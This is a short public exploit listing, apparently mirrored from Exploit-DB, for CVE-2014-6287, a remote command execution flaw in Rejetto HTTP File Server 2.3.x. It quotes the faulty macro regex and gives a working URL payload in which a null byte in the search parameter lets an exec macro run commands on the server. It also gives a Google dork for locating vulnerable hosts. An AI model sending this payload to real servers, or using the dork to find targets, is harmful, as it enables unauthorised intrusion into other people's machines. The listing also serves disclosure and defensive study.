Skip to content
cyberexploits
remotewindowstext

Rejetto HTTP File Server (HFS) 2.3.x - Remote Command Execution (1)

Rejetto HTTP File Server (HFS) 2.3.x - Remote Command Execution (1)

Published on 2014-09-15

Source code

Pinned to commit 7eac4c3a2ce5
textplatforms/windows/remote/34668.txt7eac4c3a
raw
# Exploit Title: HttpFileServer 2.3.x Remote Command Execution

# Google Dork: intext:"httpfileserver 2.3"

# Date: 11-09-2014

# Remote: Yes

# Exploit Author: Daniele Linguaglossa

# Vendor Homepage: http://rejetto.com/

# Software Link: http://sourceforge.net/projects/hfs/

# Version: 2.3.x

# Tested on: Windows Server 2008 , Windows 8, Windows 7

# CVE : CVE-2014-6287



issue exists due to a poor regex in the file ParserLib.pas





function findMacroMarker(s:string; ofs:integer=1):integer;

begin result:=reMatch(s, '\{[.:]|[.:]\}|\|', 'm!', ofs) end;





it will not handle null byte so a request to



http://localhost:80/?search=%00{.exec|cmd.}



will stop regex from parse macro , and macro will be executed and remote code injection happen.





## EDB Note: This vulnerability will run the payload multiple times simultaneously. 

##   Make sure to take this into consideration when crafting your payload (and/or listener).
View on GitHub